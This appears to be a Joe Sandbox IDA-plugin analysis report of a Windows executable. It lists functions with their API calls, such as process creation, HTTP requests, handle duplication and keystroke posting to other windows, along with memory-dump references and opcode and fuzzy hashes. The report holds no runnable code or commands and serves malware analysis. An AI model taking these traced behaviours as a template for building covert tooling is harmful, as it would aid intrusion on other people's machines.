                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037914F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 14777c558f52e849488641174edd277576720265f67fdc977856854f8451a2a3
                                                                                                                    • Instruction ID: 894a5f04ad6ad885b12aff0aaefd89399372d28c89bc6e91a4ab1b98164c9e38
                                                                                                                    • Opcode Fuzzy Hash: 14777c558f52e849488641174edd277576720265f67fdc977856854f8451a2a3
                                                                                                                    • Instruction Fuzzy Hash: FA21D375A00108BFDF12ABA0CC85EFEBB78EF45300F004116F915972A1DB798815DB60
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 0037916F
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00379184
                                                                                                                    • _wcscmp.LIBCMT ref: 00379196
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00379211
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                    • Opcode ID: c7beb419e1ade25f6856cd73783a2e789a13520a61363f313b069bcbb12b5b90
                                                                                                                    • Instruction ID: acb14cfaa1749718423ebd100280fe65f49f04d891ede50cd0e3f0fae45b8b53
                                                                                                                    • Opcode Fuzzy Hash: c7beb419e1ade25f6856cd73783a2e789a13520a61363f313b069bcbb12b5b90
                                                                                                                    • Instruction Fuzzy Hash: E2113A3728830BBAFA233624EC16FE7379C9B11360B214527F904E84E2FF65A8615984
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00387A6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725837607-0
                                                                                                                    • Opcode ID: 974ff4ac9fb3a66e7e360e98c4b8668d912b5ba0f4bbe57bef2e6bd340301886
                                                                                                                    • Instruction ID: 25f002828d2debd1973c04c49a149ddd0198fc2945d142cf18e55215d4773da9
                                                                                                                    • Opcode Fuzzy Hash: 974ff4ac9fb3a66e7e360e98c4b8668d912b5ba0f4bbe57bef2e6bd340301886
                                                                                                                    • Instruction Fuzzy Hash: B5B19E719043199FDB12EFA5C884BBEB7FAEF09321F2544A9E601EB251D734E941CB90
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0032FAA6
                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 0032FB45
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0032FC9C
                                                                                                                    • DestroyWindow.USER32(?), ref: 003645D6
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0036463B
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00364668
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                    • Opcode ID: 6ccf6acb476a12162a76929487a3b1b2faf2a9a202cd2e2df8c9d4610af820a3
                                                                                                                    • Instruction ID: 1467617f1bc1d486573d732242459ab6a950ad48d72a83e58752d2f49205f738
                                                                                                                    • Opcode Fuzzy Hash: 6ccf6acb476a12162a76929487a3b1b2faf2a9a202cd2e2df8c9d4610af820a3
                                                                                                                    • Instruction Fuzzy Hash: 65A16C31B01222CFCB2BEF14D595A69F7A4AF05700F5582BDE90AAB265CB30ED16CF50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                    • String ID: ,,;$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2862541840-903716602
                                                                                                                    • Opcode ID: f7c114fb17582213ac7547e73e1c918ea444797bf0e7bd285d720a1e3015dccc
                                                                                                                    • Instruction ID: e497e15ecf9e232a431f9840ed8baf14c305948075393e0077ee6f7e63e9e768
                                                                                                                    • Opcode Fuzzy Hash: f7c114fb17582213ac7547e73e1c918ea444797bf0e7bd285d720a1e3015dccc
                                                                                                                    • Instruction Fuzzy Hash: 1A919F71A00219ABDF26DFA9D888FAFB7B8EF45710F10855EF515AB280D7709944CFA0
                                                                                                                    APIs
                                                                                                                    • EnumChildWindows.USER32(?,0037A439), ref: 0037A377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                    • Opcode ID: edafbc39465096bdec8bd78ebdcfa514a3997788ca6403d278f33006fcc5cbdd
                                                                                                                    • Instruction ID: 1d1b23f7a12e435bbb5a3b4bb19aa097089846af4130d5377c9e90e52270e2fb
                                                                                                                    • Opcode Fuzzy Hash: edafbc39465096bdec8bd78ebdcfa514a3997788ca6403d278f33006fcc5cbdd
                                                                                                                    • Instruction Fuzzy Hash: 55910631A00A05AADB2ADFA0C491BEDFBB8FF44300F54C519E84DAB251DF356999CBD1
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00322EAE
                                                                                                                      • Part of subcall function 00321DB3: GetClientRect.USER32(?,?), ref: 00321DDC
                                                                                                                      • Part of subcall function 00321DB3: GetWindowRect.USER32(?,?), ref: 00321E1D
                                                                                                                      • Part of subcall function 00321DB3: ScreenToClient.USER32(?,?), ref: 00321E45
                                                                                                                    • GetDC.USER32 ref: 0035CD32
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0035CD45
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0035CD53
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0035CD68
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0035CD70
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0035CDFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: c6ab599e02777a9d3eed7b11d65405a2483a77c2d218ec729304a036cfe6523a
                                                                                                                    • Instruction ID: 626725052e25bdeb354e16eddd194808c9c2931965031629a712364509dc23b9
                                                                                                                    • Opcode Fuzzy Hash: c6ab599e02777a9d3eed7b11d65405a2483a77c2d218ec729304a036cfe6523a
                                                                                                                    • Instruction Fuzzy Hash: 8371C031500205EFCF238F64DC80EAA7BB9FF4932AF15526AED559A2B6C7318C45DB60
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00391A50
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00391A7C
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00391ABE
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00391AD3
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391AE0
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00391B10
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391B57
                                                                                                                      • Part of subcall function 00392483: GetLastError.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 00392498
                                                                                                                      • Part of subcall function 00392483: SetEvent.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 003924AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                    • Opcode ID: a658aba5bb3c15a615f3e768814f0c3b1d98a70336c011be1e80d184b72d2838
                                                                                                                    • Instruction ID: fb0148d6fa76567745742125cf6f990ce4033304a277e6b2a982922d507c053e
                                                                                                                    • Opcode Fuzzy Hash: a658aba5bb3c15a615f3e768814f0c3b1d98a70336c011be1e80d184b72d2838
                                                                                                                    • Instruction Fuzzy Hash: D1416EB1501619BFEF139F50CC89FBB7BADEF09354F00412AFA05AA191E7719E449BA0
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003AF910), ref: 00398D28
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003AF910), ref: 00398D5C
                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00398ED6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00398F00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 560350794-0
                                                                                                                    • Opcode ID: 1c10e2e1d3add07d67523cc895120a770aa13d3f9b49fc14bc4814e2364f9804
                                                                                                                    • Instruction ID: dce31b65d1581cf4fc9a305dd10d8e59ace10a421824f2b53b645627fc40bd26
                                                                                                                    • Opcode Fuzzy Hash: 1c10e2e1d3add07d67523cc895120a770aa13d3f9b49fc14bc4814e2364f9804
                                                                                                                    • Instruction Fuzzy Hash: 50F16B71A00209EFDF15DF98C884EAEB7B9FF89314F108459F915AB251DB31AE46CB50
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0039F6B5
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0039F848
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0039F86C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0039F8AC
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0039F8CE
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039FA4A
                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0039FA7C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039FAAB
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039FB22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4090791747-0
                                                                                                                    • Opcode ID: 30169a4774e526b2a9c8a1199eca2bdc43f2c985a9daf87b49efe8bbab7db186
                                                                                                                    • Instruction ID: f8d547de9ea451e944ada4829f66bcd14b3bbaecd0c284a7fa44f124605f9fc4
                                                                                                                    • Opcode Fuzzy Hash: 30169a4774e526b2a9c8a1199eca2bdc43f2c985a9daf87b49efe8bbab7db186
                                                                                                                    • Instruction Fuzzy Hash: 7BE1C3316043009FCB16EF24D891B6ABBE5EF85354F18856DF8999F2A2CB31EC45CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00383697,?), ref: 0038468B
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00383697,?), ref: 003846A4
                                                                                                                      • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00384D40
                                                                                                                    • _wcscmp.LIBCMT ref: 00384D5A
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00384D75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 793581249-0
                                                                                                                    • Opcode ID: 3bcc125bdda4ef3aaf8bf858f7f8f40cc662bfad79a293e1f37ebab7d77d6531
                                                                                                                    • Instruction ID: 5c0b807e52a0087fbebfd6e3c0421ca44c47ed292c1233070fcdafb43578c4d1
                                                                                                                    • Opcode Fuzzy Hash: 3bcc125bdda4ef3aaf8bf858f7f8f40cc662bfad79a293e1f37ebab7d77d6531
                                                                                                                    • Instruction Fuzzy Hash: 8B5187B24083459BC726EBA0D881DDFB3ECAF85310F40096EF685D7552EF34A688C756
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003A86FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: 9a73203843335d24c2bfadaf2e2c7c3c17bf82ee82268904bdc161a4f7581d86
                                                                                                                    • Instruction ID: bc296c8ae79bd896584e2683ba902c0caed88d995cde02a07818286bed0e81c5
                                                                                                                    • Opcode Fuzzy Hash: 9a73203843335d24c2bfadaf2e2c7c3c17bf82ee82268904bdc161a4f7581d86
                                                                                                                    • Instruction Fuzzy Hash: 1151C430600254BEEB279F24DC85FAD7B69EB07314F600221FA54EA1F1CF76A980CB40
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0035C2F7
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0035C319
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0035C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0035C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0035C370
• DestroyIcon.USER32(00000000), ref: 0035C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035C39C
• DestroyIcon.USER32(?), ref: 0035C3AB
  • Part of subcall function 003AA4AF: DeleteObject.GDI32(00000000), ref: 003AA4E8
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 0037A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0037A84C
  • Part of subcall function 0037A82C: GetCurrentThreadId.KERNEL32 ref: 0037A853
  • Part of subcall function 0037A82C: AttachThreadInput.USER32(00000000,?,00379683,?,00000001), ref: 0037A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0037968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003796AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003796AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003796B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003796D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003796D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003796E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003796F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003796FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0037853C,00000B00,?,?), ref: 0037892A
• HeapAlloc.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 00378931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0037853C,00000B00,?,?), ref: 00378946
• GetCurrentProcess.KERNEL32(?,00000000,?,0037853C,00000B00,?,?), ref: 0037894E
• DuplicateHandle.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 00378951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0037853C,00000B00,?,?), ref: 00378961
• GetCurrentProcess.KERNEL32(0037853C,00000000,?,0037853C,00000B00,?,?), ref: 00378969
• DuplicateHandle.KERNEL32(00000000,?,0037853C,00000B00,?,?), ref: 0037896C
• CreateThread.KERNEL32(00000000,00000000,00378992,00000000,00000000,00000000), ref: 00378986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
APIs
  • Part of subcall function 0037710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?,?,00377455), ref: 00377127
  • Part of subcall function 0037710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377142
  • Part of subcall function 0037710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377150
  • Part of subcall function 0037710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?), ref: 00377160
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00399806
• _memset.LIBCMT ref: 00399813
• _memset.LIBCMT ref: 00399956
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00399982
• CoTaskMemFree.OLE32(?), ref: 0039998D
Strings
• NULL Pointer assignment, xrefs: 003999DB
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A6E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 003A6E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A6E52
• _wcscat.LIBCMT ref: 003A6EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 003A6EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A6EF2
Strings
Similarity
